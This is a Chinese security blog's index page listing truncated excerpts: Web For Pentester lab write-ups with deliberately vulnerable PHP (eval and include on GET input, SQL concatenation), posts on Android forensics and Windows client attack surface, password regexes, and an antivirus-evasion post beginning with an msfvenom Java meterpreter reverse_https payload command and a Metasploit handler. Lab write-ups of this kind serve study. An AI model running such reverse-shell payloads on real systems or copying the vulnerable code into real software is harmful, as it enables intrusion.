上一页 1 2 3 4 5 6 ··· 15 下一页
2020年6月25日
Web For Pentester1 - Code injection
摘要: Example 1 源码: <?php require_once("../header.php"); ?> <?php $str="echo \"Hello ".$_GET['name']."!!!\";"; eval($str);?><?php require_once("../footer.ph 阅读全文
posted @ 2020-06-25 17:57 APT-101 阅读(186) 评论(0) 推荐(0) 编辑
Web For Pentester1 -File Include
摘要: Example 1 源码: <?php require_once '../header.php'; ?> <?php if ($_GET["page"]) { include($_GET["page"]); } ?> <?php require_once '../footer.php'; ?> 解释 阅读全文
posted @ 2020-06-25 16:45 APT-101 阅读(168) 评论(0) 推荐(0) 编辑
Web For Pentester1 -Directory traversal
摘要: Example 1 源码: <?php $UploadDir = '/var/www/files/'; if (!(isset($_GET['file']))) die(); $file = $_GET['file']; $path = $UploadDir . $file; if (!is_fil 阅读全文
posted @ 2020-06-25 16:04 APT-101 阅读(134) 评论(0) 推荐(0) 编辑
2020年6月21日
Web For Pentester1 -SQL injections
摘要: sql1 源码: <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name='"; $sql .= $_GET["name"]."'"; $result = 阅读全文
posted @ 2020-06-21 13:09 APT-101 阅读(200) 评论(0) 推荐(0) 编辑
2020年6月20日
Web For Pentester1 -XSS
摘要: 官方地址:PentesterLab: Learn Web App Pentesting! Web for Pentester 也是一个web的靶场,如下图 XSS1: 源代码: <?php echo $_GET["name"];?> 解释:无任何过滤,直接插入payload即可 paylod: <s 阅读全文
posted @ 2020-06-20 19:20 APT-101 阅读(180) 评论(0) 推荐(0) 编辑
2020年6月4日
Android取证工具
摘要: 一、使用 AFLogical 提取所有联系人、通话记录和短信 AFLogical 是由 viaForensics 编写的工具,以便从设备创建逻辑采集并将结果呈现给取证员。它从设备中提取一些关键组件,包括短信,联系人和通话记录。 /mnt/sdcard/forensics/日期 二、使用 Andril 阅读全文
posted @ 2020-06-04 12:31 APT-101 阅读(300) 评论(0) 推荐(0) 编辑
2020年6月3日
Windows客户端攻击面分析
摘要: 一、客户端侧的攻击 1. 文件分析 说明:识别语言和开发框架,不同用户瘦客户端和胖客户端 举例:配置不合理将敏感数据放着在客户端配置文件中 防御:请勿将相关配置凭证放置在客户端用户目录 2. 二进制分析反编译分析 说明:反编译静态分析,动态调试分析 举例:硬编码写死在客户端 防御:请勿写死在客户端代 阅读全文
posted @ 2020-06-03 17:51 APT-101 阅读(400) 评论(0) 推荐(0) 编辑
2020年4月29日
使用Google软件包签名,绕过杀软
摘要: Kail Linux # msfvenom -p java/meterpreter/reverse_https LHOST=10.10.202.130 -f jar -o meterpreter-https.jar msf5 > use exploit/multi/handler msf5 expl 阅读全文
posted @ 2020-04-29 14:23 APT-101 阅读(636) 评论(0) 推荐(0) 编辑
2020年3月19日
常用正则表达式大全——包括校验数字、字符、特殊密码过滤
摘要: 常用正则的,可以在下面找到最适用的正则,前端常用的,收藏,不用每次都去找; 介绍: 1、'?=.'的意思是断言;只匹配一个位置比如,你想匹配一个“人”字,但是你只想匹配中国人的人字,不想匹配法国人的人;就可以用断言做; 例子: 必须包含大小写字母和数字的组合,后面的{8,10}表示长度 ^(?=.* 阅读全文
posted @ 2020-03-19 11:04 APT-101 阅读(500) 评论(0) 推荐(0) 编辑
密码强度正则表达式 – 必须包含大写字母,小写字母和数字,至少8个字符等
摘要: 需要一个密码强度正则表达式在用户注册时校验用户密码强度:密码至少8个字符,包括1个大写字母,1个小写字母和1个数字或特殊字符,例如#,?,!。网上搜索了一些解决方案分享给大家。 方案一 至少8-16个字符,至少1个大写字母,1个小写字母和1个数字,其他可以是任意字符: /^(?=.*[a-z])(? 阅读全文
posted @ 2020-03-19 10:45 APT-101 阅读(1311) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 15 下一页